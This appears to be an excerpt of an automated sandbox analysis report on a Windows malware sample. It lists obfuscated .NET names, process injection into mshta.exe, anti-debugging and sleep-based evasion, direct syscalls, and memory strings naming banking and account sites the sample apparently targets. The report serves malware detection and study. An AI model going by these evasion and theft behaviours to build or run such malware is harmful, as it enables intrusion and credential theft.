Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Gd76mDWZKpqfwPKmka.cs	High entropy of concatenated method names: 'jiLflDRYaW', 'F91fA5X2Pw', 'aqAf4ZIymE', 'qgRfCZAh86', 'xxrfQagSAV', 'dvhfBDGeAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, TYyClyOeXd3w466CEj.cs	High entropy of concatenated method names: 'ToString', 'EqhsDnZ36N', 'svosk7HlOm', 'M3CsjGwTAg', 'mtjsmqF49r', 'VcAsKF7OGV', 'IKps0bk4YM', 'XwcsNZNLxe', 'B1Rs7DMnjs', 'HXrsLWjb2w'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Fruk7QkrUMaigfoKyg.cs	High entropy of concatenated method names: 'fX0jxgEKSRXxMw51B47', 'APW4YcEsLVnmFn8Vnso', 'Cvi4ynjcbt', 'eLX4QaxyCG', 'yZH4fuVppd', 'G9TRH2EU4r7Ji4V6qaC', 'rgNQ9LE02EraIKYatYe'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, RknYeUtF7jZHMvrA5KU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'riOiQsjtwA', 'k21iffJ91Q', 'RMdiviFsGZ', 'H5IiikM4Kj', 'DpQiIIu1ZX', 'oJpicUDkc9', 'TOAin4ymt9'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, V9Jx9IFC23Jbc4pNda.cs	High entropy of concatenated method names: 'DgNtCc4bZF', 'KdItBTBykg', 'sRYtPf9OEe', 'orLtd9WZNp', 'n3ptHmKexr', 'xA0tslMhYQ', 'o4FpZRGNijQxxwwe7K', 'vL0P9vcmKlqvaBQ2t1', 'wrxttwUfyF', 'tW4tMNKYFq'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, cRFNdgTmP0eY04ienr.cs	High entropy of concatenated method names: 'vAUHVv0445', 'zvsHqSi3Sk', 'furHTAZFxm', 'lKJHuRvpJf', 'NYRHkOrGRK', 'iqSHjVm40h', 'rsCHmlB2MU', 'wRbHKEPtAs', 'vw7H0BQuM0', 'hVTHNOnFma'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, ijjPIXLRhmcgw3Y6Ch.cs	High entropy of concatenated method names: 'BWuCpyoqd9', 'mhlCXa1nGi', 'PBtC3o5LZJ', 'fAhC5RCxmg', 'UHYCZsGlpf', 'FQHC6YTMK6', 'Br1CJAaUSI', 'efBCGwB138', 'EAUCY6iTp7', 'FYuCoC8KhZ'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Lc4bZFGNdITBykgft4.cs	High entropy of concatenated method names: 'OElxTgpFnU', 'MD0xutKMsh', 'eVQxOCJ7kl', 'lkNxrTZpoG', 'GDTxgiEtE6', 'xBkxbfe5qO', 'IZwx1QGgJk', 'N0gxaTiQTf', 'bP0x8j51WC', 'KQYxWrFAk9'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, nxSi3fYRYf9OEeerL9.cs	High entropy of concatenated method names: 'irCl528wcZ', 'yl7l6tMrNv', 'vEslGrTm0q', 'tn4lY9BAH9', 'TvslHWFBW2', 'BIxlsC7fA3', 'I7olSYe3dt', 'vyhly38eyk', 'luDlQrZ3EB', 'G4Olfh1IH6'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YZNps8ofNIeare3pmK.cs	High entropy of concatenated method names: 'c6VAZsP06F', 'hMeAJAudMO', 'Dm1ljdcsUZ', 'KHWlmfQW7a', 'X9jlK9sZVs', 'Jvpl08sLb7', 'fcXlNU0LVn', 'kj3l7ERb4Y', 'rs9lLsTIDC', 'ocplVHb3ZR'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Vgce4pttdJNiloW91AN.cs	High entropy of concatenated method names: 'LDcfW6XhRy', 'gmnfzofaTZ', 'kO6vwgDKKM', 'N63vtkMYPt', 'qBNvhyp9JU', 'EA1vMBuoU2', 'qNZvFtJ7Qv', 'jUyvUsvEUM', 'hRRv9quFdT', 'qW2vxybINx'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Fn31Uxr7qZiuLg14s4.cs	High entropy of concatenated method names: 'CQJSPZLWD0', 'dAnSd6HI2w', 'ToString', 'LYnS9G5abo', 'mt5SxnpV7V', 'xiMSlWjWKX', 'bt5SAZUxLb', 'RqJS4Kaie5', 'Vb7SC31nmE', 'QO0SBsoVco'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, MeK5j51KK7Zo9MYpfs.cs	High entropy of concatenated method names: 'QplQHqJJpK', 'pslQSaY6EE', 'NO2QQYEqdn', 'BNrQv3kKpF', 'bFDQIqDgOI', 'H5SQnHAN8M', 'Dispose', 'uaay9gRpGp', 'rSryx9u70g', 'uCYylq7ibG'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, cd5UL2xGpTyZLdPmf9.cs	High entropy of concatenated method names: 'Dispose', 'MZot89MYpf', 'Fqkhk2wUDU', 'FcijwEfmkc', 'ppWtWAenl9', 'rnftzioPPq', 'ProcessDialogKey', 'G9QhwP38Rc', 'yiShtxQ5kv', 'niUhhRd76m'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, OxVokS2EHy4Z6aRHLG.cs	High entropy of concatenated method names: 'RTQeGLoIuP', 'vhceYFbZRZ', 'HeMeRoR3I4', 'obwekpxrAI', 'nh5emA60rd', 'o9teKN8Ykj', 'ewweNl5Mth', 'BHNe7NXsQV', 'AfGeVaYR6B', 'IaieDoTH44'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, VvMa2YtMfAErLVpMR9W.cs	High entropy of concatenated method names: 'CPTvWHGvac', 'QVKvzvqmMX', 'sMxiwJyh7O', 'W55JfOj8NTNRrDfGu8F', 'YJqmppjrCKwqVsGAIoS', 'E4t56ZjGnQfynsMmbNp', 'vQvdqojcIu7BrB8aTZ1', 'aB3g2djz2tyxV4dYUGu'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, nxrpA0RlMhYQGDbFB5.cs	High entropy of concatenated method names: 'TYP4UnuSod', 'zx14xVL18O', 'iGB4ABKp8N', 'Gqs4CPZQl7', 'rwn4BKBMZI', 'qwKAg0ayQU', 'LCRAbuOP5J', 'a55A1t9lQn', 'UxZAaZ2tvN', 'Yt2A8OnA8a'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YR3UhFBCAwxsjWMigU.cs	High entropy of concatenated method names: 'A57MUq6rVO', 'mjfM9KAmTL', 'QgvMxsYWwY', 'gb1Mlsnbjc', 'KQrMA6cg9u', 'AY2M4UWPPG', 'vFBMCfFvVh', 'cbAMBJ168K', 'xYmMElyDG1', 'bMvMPtNlX6'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, yFqoYQzcZERJEEHrlC.cs	High entropy of concatenated method names: 'RE1f6KE7eZ', 'BeafGPK59m', 'RAgfY7nmGg', 'ruMfRdV2GA', 'zHAfkePlDm', 'hq3fmYP6u1', 'GKYfKRlgRh', 'WmffnyDJmo', 'AdGfpQIBKg', 'il6fXp6twb'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, NPTeZCbRKhuUjAUPpq.cs	High entropy of concatenated method names: 'KeqSaeZBNs', 'XQISWepXBl', 'GbFywDL68G', 'aMTytr0BXu', 'vKWSDlCbto', 'XbZSqXeNXJ', 'gE5S2tgeba', 'Tr5STMLxDO', 'b7wSuosA84', 'rAfSOADSGP'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, s4O5lkhFhKnR0JUHmQ.cs	High entropy of concatenated method names: 'EP53tiE3M', 'aSb5Ueb4i', 'hPM6gHyxd', 'JgmJTfF1v', 'eQ0YZVkbE', 'Ps6oI2d4h', 'VCRPA6PPweXo60HXwU', 'VQVdMynylCABJdNA2R', 'r0hy28YZw', 'TVXfwxcT5'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, rP38Rc8XiSxQ5kvdiU.cs	High entropy of concatenated method names: 'UUNQRumY88', 'npEQkvGDHL', 'xvfQjrbfvM', 'EOtQmh1O0L', 'OQRQKZYlrx', 'gsoQ0IPXdD', 'bRFQNW6BXx', 'PJnQ7k1X1c', 'AGjQLxNdxi', 'nPKQVIlfFb'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Gd76mDWZKpqfwPKmka.cs	High entropy of concatenated method names: 'jiLflDRYaW', 'F91fA5X2Pw', 'aqAf4ZIymE', 'qgRfCZAh86', 'xxrfQagSAV', 'dvhfBDGeAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, TYyClyOeXd3w466CEj.cs	High entropy of concatenated method names: 'ToString', 'EqhsDnZ36N', 'svosk7HlOm', 'M3CsjGwTAg', 'mtjsmqF49r', 'VcAsKF7OGV', 'IKps0bk4YM', 'XwcsNZNLxe', 'B1Rs7DMnjs', 'HXrsLWjb2w'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Fruk7QkrUMaigfoKyg.cs	High entropy of concatenated method names: 'fX0jxgEKSRXxMw51B47', 'APW4YcEsLVnmFn8Vnso', 'Cvi4ynjcbt', 'eLX4QaxyCG', 'yZH4fuVppd', 'G9TRH2EU4r7Ji4V6qaC', 'rgNQ9LE02EraIKYatYe'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, RknYeUtF7jZHMvrA5KU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'riOiQsjtwA', 'k21iffJ91Q', 'RMdiviFsGZ', 'H5IiikM4Kj', 'DpQiIIu1ZX', 'oJpicUDkc9', 'TOAin4ymt9'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, V9Jx9IFC23Jbc4pNda.cs	High entropy of concatenated method names: 'DgNtCc4bZF', 'KdItBTBykg', 'sRYtPf9OEe', 'orLtd9WZNp', 'n3ptHmKexr', 'xA0tslMhYQ', 'o4FpZRGNijQxxwwe7K', 'vL0P9vcmKlqvaBQ2t1', 'wrxttwUfyF', 'tW4tMNKYFq'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, cRFNdgTmP0eY04ienr.cs	High entropy of concatenated method names: 'vAUHVv0445', 'zvsHqSi3Sk', 'furHTAZFxm', 'lKJHuRvpJf', 'NYRHkOrGRK', 'iqSHjVm40h', 'rsCHmlB2MU', 'wRbHKEPtAs', 'vw7H0BQuM0', 'hVTHNOnFma'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, ijjPIXLRhmcgw3Y6Ch.cs	High entropy of concatenated method names: 'BWuCpyoqd9', 'mhlCXa1nGi', 'PBtC3o5LZJ', 'fAhC5RCxmg', 'UHYCZsGlpf', 'FQHC6YTMK6', 'Br1CJAaUSI', 'efBCGwB138', 'EAUCY6iTp7', 'FYuCoC8KhZ'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Lc4bZFGNdITBykgft4.cs	High entropy of concatenated method names: 'OElxTgpFnU', 'MD0xutKMsh', 'eVQxOCJ7kl', 'lkNxrTZpoG', 'GDTxgiEtE6', 'xBkxbfe5qO', 'IZwx1QGgJk', 'N0gxaTiQTf', 'bP0x8j51WC', 'KQYxWrFAk9'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, nxSi3fYRYf9OEeerL9.cs	High entropy of concatenated method names: 'irCl528wcZ', 'yl7l6tMrNv', 'vEslGrTm0q', 'tn4lY9BAH9', 'TvslHWFBW2', 'BIxlsC7fA3', 'I7olSYe3dt', 'vyhly38eyk', 'luDlQrZ3EB', 'G4Olfh1IH6'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YZNps8ofNIeare3pmK.cs	High entropy of concatenated method names: 'c6VAZsP06F', 'hMeAJAudMO', 'Dm1ljdcsUZ', 'KHWlmfQW7a', 'X9jlK9sZVs', 'Jvpl08sLb7', 'fcXlNU0LVn', 'kj3l7ERb4Y', 'rs9lLsTIDC', 'ocplVHb3ZR'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Vgce4pttdJNiloW91AN.cs	High entropy of concatenated method names: 'LDcfW6XhRy', 'gmnfzofaTZ', 'kO6vwgDKKM', 'N63vtkMYPt', 'qBNvhyp9JU', 'EA1vMBuoU2', 'qNZvFtJ7Qv', 'jUyvUsvEUM', 'hRRv9quFdT', 'qW2vxybINx'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Fn31Uxr7qZiuLg14s4.cs	High entropy of concatenated method names: 'CQJSPZLWD0', 'dAnSd6HI2w', 'ToString', 'LYnS9G5abo', 'mt5SxnpV7V', 'xiMSlWjWKX', 'bt5SAZUxLb', 'RqJS4Kaie5', 'Vb7SC31nmE', 'QO0SBsoVco'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, MeK5j51KK7Zo9MYpfs.cs	High entropy of concatenated method names: 'QplQHqJJpK', 'pslQSaY6EE', 'NO2QQYEqdn', 'BNrQv3kKpF', 'bFDQIqDgOI', 'H5SQnHAN8M', 'Dispose', 'uaay9gRpGp', 'rSryx9u70g', 'uCYylq7ibG'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, cd5UL2xGpTyZLdPmf9.cs	High entropy of concatenated method names: 'Dispose', 'MZot89MYpf', 'Fqkhk2wUDU', 'FcijwEfmkc', 'ppWtWAenl9', 'rnftzioPPq', 'ProcessDialogKey', 'G9QhwP38Rc', 'yiShtxQ5kv', 'niUhhRd76m'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, OxVokS2EHy4Z6aRHLG.cs	High entropy of concatenated method names: 'RTQeGLoIuP', 'vhceYFbZRZ', 'HeMeRoR3I4', 'obwekpxrAI', 'nh5emA60rd', 'o9teKN8Ykj', 'ewweNl5Mth', 'BHNe7NXsQV', 'AfGeVaYR6B', 'IaieDoTH44'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, VvMa2YtMfAErLVpMR9W.cs	High entropy of concatenated method names: 'CPTvWHGvac', 'QVKvzvqmMX', 'sMxiwJyh7O', 'W55JfOj8NTNRrDfGu8F', 'YJqmppjrCKwqVsGAIoS', 'E4t56ZjGnQfynsMmbNp', 'vQvdqojcIu7BrB8aTZ1', 'aB3g2djz2tyxV4dYUGu'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, nxrpA0RlMhYQGDbFB5.cs	High entropy of concatenated method names: 'TYP4UnuSod', 'zx14xVL18O', 'iGB4ABKp8N', 'Gqs4CPZQl7', 'rwn4BKBMZI', 'qwKAg0ayQU', 'LCRAbuOP5J', 'a55A1t9lQn', 'UxZAaZ2tvN', 'Yt2A8OnA8a'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YR3UhFBCAwxsjWMigU.cs	High entropy of concatenated method names: 'A57MUq6rVO', 'mjfM9KAmTL', 'QgvMxsYWwY', 'gb1Mlsnbjc', 'KQrMA6cg9u', 'AY2M4UWPPG', 'vFBMCfFvVh', 'cbAMBJ168K', 'xYmMElyDG1', 'bMvMPtNlX6'
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, yFqoYQzcZERJEEHrlC.cs	High entropy of concatenated method names: 'RE1f6KE7eZ', 'BeafGPK59m', 'RAgfY7nmGg', 'ruMfRdV2GA', 'zHAfkePlDm', 'hq3fmYP6u1', 'GKYfKRlgRh', 'WmffnyDJmo', 'AdGfpQIBKg', 'il6fXp6twb'

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD324
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD7E4
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD944
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD504
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD544
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CD1E4
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105D0154
Source: C:\Windows\SysWOW64\mshta.exe	API/Special instruction interceptor: Address: 7FF9105CDA44

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 4C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 70C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 8C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: 9C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: A4F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: B4F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Memory allocated: C4F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Window / User API: threadDelayed 459			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Window / User API: threadDelayed 9514			Jump to behavior

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\mshta.exe	API coverage: 2.8 %

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 8124	Thread sleep count: 459 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 8124	Thread sleep time: -918000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 8124	Thread sleep count: 9514 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 8124	Thread sleep time: -19028000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe TID: 8160	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe TID: 8160	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe TID: 8160	Thread sleep time: -61500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe TID: 8160	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe TID: 8160	Thread sleep time: -41000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mshta.exe	Last function: Thread delayed

Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 3d8W0FR.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 3d8W0FR.9.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D53000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq%Tve
Source: 3d8W0FR.9.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 3d8W0FR.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 3d8W0FR.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 3d8W0FR.9.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: firefox.exe, 0000000B.00000002.1801082486.0000020646D1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3d8W0FR.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 3d8W0FR.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3692100398.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: 3d8W0FR.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 3d8W0FR.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 3d8W0FR.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 3d8W0FR.9.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 3d8W0FR.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 3d8W0FR.9.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 3d8W0FR.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 3d8W0FR.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 3d8W0FR.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 3d8W0FR.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 3d8W0FR.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtAllocateVirtualMemory: Direct from: 0x77172BFC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtDelayExecution: Direct from: 0x77172DDC	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	NtProtectVirtualMemory: Direct from: 0x77167B2E	Jump to behavior
